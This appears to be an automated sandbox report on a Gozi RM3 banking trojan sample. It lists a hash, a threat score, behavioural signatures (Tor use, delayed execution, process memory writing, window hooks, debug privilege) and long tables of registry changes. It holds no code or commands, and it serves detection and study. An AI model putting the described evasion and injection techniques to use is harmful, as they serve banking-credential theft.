Malware Analysis Report

2024-10-19 03:01

Sample ID 220315-mfdacacaak
Target XqBTvE.ntwgj
SHA256 ea10f282be1864ccfe204fcba69fea1b172213a5dc114ef46c629a1ea98c8c24
Tags
gozi_rm3 banker trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ea10f282be1864ccfe204fcba69fea1b172213a5dc114ef46c629a1ea98c8c24

Threat Level: Known bad

The file XqBTvE.ntwgj was found to be: Known bad.

Malicious Activity Summary

gozi_rm3 banker trojan

Gozi RM3

Uses Tor communications

Drops file in System32 directory

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-15 10:24

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-15 10:24

Reported

2022-03-15 10:27

Platform

win7-20220311-en

Max time kernel

4294235s

Max time network

196s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi RM3

banker trojan gozi_rm3

Uses Tor communications

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc00000000020000000000106600000001000020000000f463ff1144ddfad6d5c471ca8a731a5905122e6e60686a810b4f99d1573f2f87000000000e800000000200002000000009c301d33538c4c54de262b392ebc0be6fcc21c6c631dcf565c3c5c7a988126730010000437b3d2514b62d34840eceb255d8eea618651cf3db311610574d1a228fb5b2fc8b7a48f1e6898639372b799c365eaae323b2442c9e7198ea7b1f266ea7790da357d5eb64e303c9b68f57523fea11ebd8f99536fcc3bca9f30863e23db99e17eb120034f0df8cf957ee1a7f5792a0326e7f194fac7df72369064686d7fb2c7d9ee8647a0a754fba0785cfd0bdf6e2c0e28932a039ec70cbad05381860d5ed8cec986e0c958420be85f898d3c14910251f9e44b1ca0cc1546789f5bd7ccaf97756fc80c9ab12e07e6854dcec92661724a21c4c2f27f73d71de2b07ae0ac2c1002dc42f6ec2e38164718995c9a541e6b17bac6e0b9498c242e5c1cac3151b419efaa6a0520260e6654828329ea1b30911d71d1917c4ea8c0cd2694b036d8d651ea4aadd7e1301b65b9ac09eef91ef49d04e40000000fc415d7ddaf22114553abece85711bc12b6a85e4b779526b0c8a12721cc4ccddccd7a281ee3b8d1a6c55597296f52b59d284cf3a2d0e780377d6f982ea5ac70f C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc000000000200000000001066000000010000200000008049ed1697b07dd1ecb6ba9d0e54a3b20439486185d18acb535fbc350df058e8000000000e800000000200002000000064b3d44afa7e882721ad00c62fa499cf2a4246e73a5db612e70d782c7fa2cd993001000082616c51b59d9651034229b468f7f10a9a26c3f8d0a52d29592fb0f61330c993c3656f30b69672ebad0d31a1e7133ffa2ef4a3206599df3bbc613504eeaf251b78d89304a708c450881e76ecde3507103cbdc36ea9d64f61c8ed4b4be9770514cc74a5a517f6ef18b157a8e06b2765075af07269427c0af275e27154039c25cb9789c467ec070f041888c5d67e967073aff1ee43f93d20a49816138a15f3eae8bb1385d3863f75ff2adfbe5dce776033b2bb651dd4a4f7b406eaa9646e2ec1876476c8aae192cb20dd2a1ea08c3bbf64d53ce561cd9fe23bbf437472165ba9d3f38919975b47cb4443da6068a895de2d0d2bd22acb8ea960835de03d5c4fd86c68599c6a849639c6c5ec43d122890f24bdd9010c4782d6e8f2cd518a4233e8b474cf151e6e844829b16c9f01aa7c51b5400000009360faa78c33906480acca0ae65524092cb65367e02a6b39c74b31df9da1cfc863559ac51d5cc012b0948188108e79dad7c6ecbf3d14151c3e1e877eb9520bb4 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc00000000020000000000106600000001000020000000274c9cc428922f6792ef2ab7212a8b3c31b7fbfdb030a4b748f7809d09bd8b57000000000e800000000200002000000081f9f319f394edeee39c296dc4c78139cbeb54391cb35187e7fc2f86ea58ac8a30010000c923101f8caf205bd4abd2b85ebfd1e50e29ef91c48f3e97cba57174f3c0314a2c3cc033bb314d6ad770acc276a7bfda95a082f8d7723041befd1bf6f70c0c2bfa8bb34c5593b02b63459c0d0103edec287641cd16e634f7e7e4c3080116ee9b2d0688b6c065f74b1f7297a4a329c2de59b389fc5c62f42c1709f505f0f2f0e0e81b8ad95695c9f78dd37ce2d25d1c780b500d41cb5abd3e49532269a331c3444c026d8346d49e3be5a4fc3b2ec0aacc4e55c95b7e6a9e75b2118360d6f0d9dc4c607261bdef7f97b822f95ee2fca0b3480da4b2da49c2c55c389eea14ac62b2e8e59e23b08d2e8017889f9d4c609b4e09fb7a92c0a1df9fcd5f19b2bbb4c4f72db9aa02cfeafb4664d7ee313541093e11753dd419a91de68c89ecd6b195a295ea45db01f39a83bc33e87e496470137840000000c077269a2a48e0fb70c3e20ab93074cf19d022481852c69e6b7af8efaa0441efda3e2a199e62ed819f7c999aa67a148e329b9ff0bc1a9c13e3144d84153f0be7 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc000000000200000000001066000000010000200000008c5b7d0c7d3e16b5156a0e04f06a866cbf65e0904d2e4e7bb24470c8a8b6083f000000000e8000000002000020000000e478599110546c1c3f7997ff1ecf82f7a445361c89d89b3597cb0fdcf0372604300100001909a083513c970dd89bed0eaa6a59f2bc9e25abf1a41f54afeb84a9beb7ea576bd4992d4c9e6f571ab6148fae32d48e3ecf265a485fcd66f426310cf426520d8131ba86dd77d8cda050e403eadbf996c4903a5e241ac25eee411a5f993ba25a0846b018d0ff3f32fe17586031d951d6f5317ccf22f53c8e726b1bc480b50072f0c227fbc30cffe867a39818150ef36fc5c42d6d769c2023a94e76f5994a4d4c34b3fdfe85bdbe5e68cee3f545efb77f29e3740c80c26b9c88f56dd904c3e5218eebf563c99772077cac79dc941575793f7a53bc9c188b94063032ff13d4ee05f9f21392f34f9051497a8735984c37c00bff34c914301fcac58db63cf36293fb5d9a7b8a769336fd772b10ab3449bb6a828a4ed284e8f171a9964dfbd8db9a5b5b4970ea075d50ab81667b2757c8d8ef40000000403b152fd4df7ae0420fa390973dc19161077f8b75b786329345ed77801179188a293aeedb18ef83429f29339e4a669941021338c5ada10a2fc995e37cf36f01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc000000000200000000001066000000010000200000009e04470ca9b18a8887c9df04daa8d8f4956c743ab60a758de3b098bb43eea872000000000e8000000002000020000000b696ef33a299ea9e5a15b0eccbe38ace8fa77de1413431a2ce8f01a6808c259730010000a7ea0b69176fa160dcd6c29895641552083c73416a96eaba7b8458c8209ac0f10256dc979f817db438e1bf99a478351adc8faa6b5565deb6a5c8f377253e6dd94ab511abf4c5eebe44c26f9b5486717c68821a96101471072a89bb87ac2aebce6843fb42a0014a733330506d0e774d9e877606a1f5873f27778a998f2da0e21bad44b41d1fd48be25c36050cda7058ccc5ceb7e8e43d23583ea9297c3e084969423326059ac52fbdb2dab9510fceda78bebe2f6dde6c2c189a062dfc9cfd6ad6a996864bf897259affa2fbb4c014f9a4566a347f5a92687cb23dd2a5bb4d516e6ab39bb5615e8898656386090fe6cb03af0947bc7890c18e5d56f525e4a7ed3096209a63f887f5822733fe53b28f7919fc634893525e47434774b140dd32b5cc9ccd3c35dc3d2e29e2a30c8c3382ee4040000000368078ab664e473a33626438cc089c81bff95a33a3dc6aa589801469c3bb5c7d29e16d11c26841cea4ff4fa5cf905b25e69c21990c71dc5ce6f267876232bc43 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc000000000200000000001066000000010000200000008c6ac78a9c02bb691000dbaa9a2c79699caee8caacbb38417a13c9cdd9d5bcc9000000000e80000000020000200000000f199234ac4e59d3eea4bd150d24ec2f58f942bbab054eb9d03e85a526a9340430010000392475654227696321847e632dd6a811dbcd66e55686fd7912cd16b38f8bb78b3295c877a80f6334fb6e9bcecc5484fc08e40f8c358d52593dab15da5513253df1b4acda2d1ebe52a1de1fed0bcf622a28775501d16d20cbffa29238d3a0015642226b2c7b2313f04dfc5b6a53d0356ed28360b97935bd2dcc1fdf453c24ade16a1bd666e985eb2f816a82e7667b150babd42c83a0a5fafee2e621ac8b329db8c129ac726a4cf7743d45d65f41f19c3123e3ae1e47cf406e9915d553550f6d70fe28b448fa59e3f18002167acbbb1fa0fad091481fcff3e5c20cdd547b2783e303550b768855704b14ade597b4f2216af86ce3f5f2af20881b755381751aff58d8354bf7f2c9c2b8f2402afb235056a317abd8a10748023c0a7a1402c50be7a12e0c92ad407c80d4e8a093203412c36e4000000066db87c37fd8ce488332aab5f5f1b83ec66d731a65df6b7debba94d6b1812aec181b64ade807135c6833bae2ba3c0a8b10c5f7fd3226d1904c9f4625fdf5a5f0 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc00000000020000000000106600000001000020000000e4c887db3df0d992c00955e1affae04cc8d5ee0534aa8eba51f9f907fa3c50d3000000000e8000000002000020000000b4ea54a190431454504210760f5d433cb6323ff2919c384ef50eadd99fbaaf9e30010000df4b712860c6e36c95202bea3e319150d2efd992bd26c8fd636c4d3794983420484b3faec2e0276ac3fbef3a45a0ca768ccec2ba5901bd9576da13231f8b7a89f7955978079a13f5bb674fed83fc381ec29a6c00dc0a56e9384be81947683aaf7ed8bc69a1ddf4f1cce6a651e489a808d7d35f930d4b492fd4e0eed4eddfb3e0f8e62777b1cf413d42c43c860a5c54657f30eecfc69b0bf4be252634996221282afc56608d10c7a4c46e78878ec79a9fee0c484de876f2ad437a503e550ffdcda22fa76f427b8a3d54696232b3d0111aa3fa64e81dedaa89ac0a00c605fdb6493352adc325989f12e97e08ba2baca4279cee71950cd3215e3ef08c5056725809216e5df376067f29a2da1ed3dd332aae9e0df0644fc1703ce83e136e88afc4e72a14e258bca760dea206ea11ae80386640000000cf5b80d213943ccdf611dd0c3bf3eb5d025890466c5c161653cee09f0014901d04404529b4a396168ef3ce62e8d4807737d5c125de57092c79172159f9cd336a C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc0000000002000000000010660000000100002000000038ec2cef7c9aa9b17a340046fb3ca452eb3be4d77a04dc6f165cd6d0311f34be000000000e8000000002000020000000cd4f786bb16bee1a142fc2fb3e998635b7afe623a0ed22a18ec46d4f027a16c4300100004dcd38d7a260e4c849f02537cb10d1a9a9f1e64e4a4df286dd2c3cc3e40fb774fe2d8748e04b0f1da3f07373d002e833df4c74e67df39c44ac95efee3a2fcbe809a6e64b6c3760c6c726079db6ef4bbb59491bed5e357874a10d958ccec0cb7c705481ff20e7f7d8686ff6c8384e8547903e616af79765face2b94505be687042c3d186a0bc9db6fbbece3034490a3609820a751c681b1f6de0159a2d370f86000f3f57060dec3c916ad7bcd86dd92500545d4d4f22e060a07e92f45e4739c40ee34bcd9ba3ab3031f277019faee369da89c05a0a1b83a7e845f51de1bebc8526de4784c49e435e1890e0a2a28a1029127524fca89c4edb3492149e8ad8466c923d0aaa8f2dc3788e123b123a1d0da9e8208751a5da63028a8a2b03233cb3e75606942b100ac9b94e1bd760e056adba6400000008c3ac71f0c532f5900501d5620d5a2d22681c899896cd1edb6df3c7b069d0d0debc99e8b131b3accd5f195cfc15a2f1aaaac09f41bc12379e0b24d9937616b52 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{369EC241-A44A-11EC-AAE0-5ECE7ED1C3DF} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc000000000200000000001066000000010000200000003d1ca933c56305dd97b042199e5ac037a18d54b45654f203957c061a85035237000000000e80000000020000200000007243f87483168e0075e564a0a159241f295558f7ca0b426ea3a6fe93b45f1bad300100004a4c2999b4904dde5fba1303ce6303a2b60506a97c48b7f7f8ed25378efc46a03f1a7a5af53ec100d9350cc075ad7913f4c05aaadc38819961063c1301f12d345940d0028b04859880970704094cb72221ba83b0b09b71b4b371930d32e1515d82b249e83dbab3da0506509ce0c430a46016ac34bef7e97921c04d14d8d001abc130aa7b5ba76b8cb6b2a91587ca9e1ba41cb7975bc8daae48c66f08b3c4f8cb35a4298d4572608ffc5f4b12f3da584c6bbafc7c30758b8417f4ec986dc2c414ef4b680f8b7f6afa02fb9316505caf6cebc95a9ae0d03a978c13c442561c299feae356b41e519869476790df561bb190b4da442ba763962813be4ce09045a3479ee3431908d163d303cb43fa5d56858e1d8de7909f8abab0914bcdc7713038c5d4a907429e9286f43e3f027c2db306fe4000000005aa908eab85d8b7be2603b3d3a1e15e0d8152edc730282c13715c8b7ceb59f21e1eeeb5d59c1cc2b17d13f3d23024e2cebb7404392bdb119e69602f41fa84bb C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc0000000002000000000010660000000100002000000064fad1ab0796e565f081287559c9c65b5fcd8da9d61391a80380e0209d6f4836000000000e80000000020000200000004f1eba19b0a59d5388e75f68547ee74022e01269ffa8657b6367399a01cc6976300100008bb5e0885f203a98eea34c0d4b6550b109ac7f6a599fe314c1c6cb0ed2994b07e1a888b5d0af9ac5aeb7157f46d023ad783e1f6b1210493c7ba6b44d8f8dd964f82c2b8b429343d391c83ddc8ca2d6cbd3fca09e0f2472d42e3b58e33b544c909b847a4a310f823e821d5b583c6c25df501397197b2607223dde602405dc33996d00efb8b9a3bddead7d76e71f3de25648fd36f424d88ba3d14a970c4c567976198c76bba6dd365d48c1229634b26a7a9fe86b406c0b5a6494300697cd79f14605e8cc1c27ad6c9098e19fe0f3b2217e9a94167767fc5e59c556d9df00be5f296baaa97a0918e4fe75dcf1471a273cd580a380ae128dadd4260c0da67bbc872d6b3a085754dc2258e415ffd9736b7d1ad5d788e4bc9d5737e0aa53752387e50d3073c9f127a84d6c15068a400b6da04d4000000036973f4463fca7ab35a7ab55c34eb2628629e62313b603cdfb58454ea42b0aa07a68ac99adb2609034e4d9d96fb452c6545684d80de135bc528fda57bf9b5c6d C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc0000000002000000000010660000000100002000000064c314093f9263ad8e777ae4325fea6599d16ae8ba83cf39eabba7049e7c67ce000000000e8000000002000020000000ecb1a323eb8ddcaf3031605979b3362ac193545437f0cfa470edf1e00fa333953001000097bec2ec93754940ce9997a6ef3e65d2484b5ca7c9383b7d949a2d62f85eb729e50d1d1466478c21c5a03b7efcf5e60f65882b1729f0277b92d9dd2e14dc575fc335da3acb9d14dcc5296b47d5489a1891098300b4eed32f46e693dc6ad2f210deea42a330d1ec5bf9a5bded3d2464072e2875cbd808644525642966220b4d24a6c328254039465283af5e043cbda5a5088702a43c9f8321dcd1f7af9d26994498735b16d18084910829b93e17ca50271b0989f64f6f69c453abb399c2aafb895c620deefc9a05e098d76a42d4ed1ff590b40ffcffc74e4ff0c6337fe3b72f66ac11662e2400fe54f1db5959a2425f82e644b2af0eff6b7863a9e577c91fa963c9a5ca17e95b5b1fcfbf01e564291468b3646f94a8c9748354c556d7edc7165c722e51274fedd99cf3d1e0655dbd613f4000000067660b432a634968406d1c0e8f27cbbaf7c40c519a2d1bf336d042b64617a8e358f6aa7d1dbb855822cad957051aaed146eff04346fed059e7ab8fdbd0c0b10d C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 0031e9085738d801 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc00000000020000000000106600000001000020000000c6492dde4c3684eec29a23bbf9c91afffff7f94293a5542ec802b6995f89841e000000000e80000000020000200000007a108a2c25f650825ebb1ec94a61217a571042223a7188c3356fd88e360a1fb120000000a4f4c0180e861c49d74e076f38c51d83b6b28607aaa49b3a70d027d6fb0c62b240000000a00fff0d83ffcc52f124ca7a2e4fd41f396a9d934eacd8c7624426d8339871aae131ab01268a25fdeb1041413f03da01ae1584bf4d64c582098cb8f3c4468a40 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XqBTvE.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
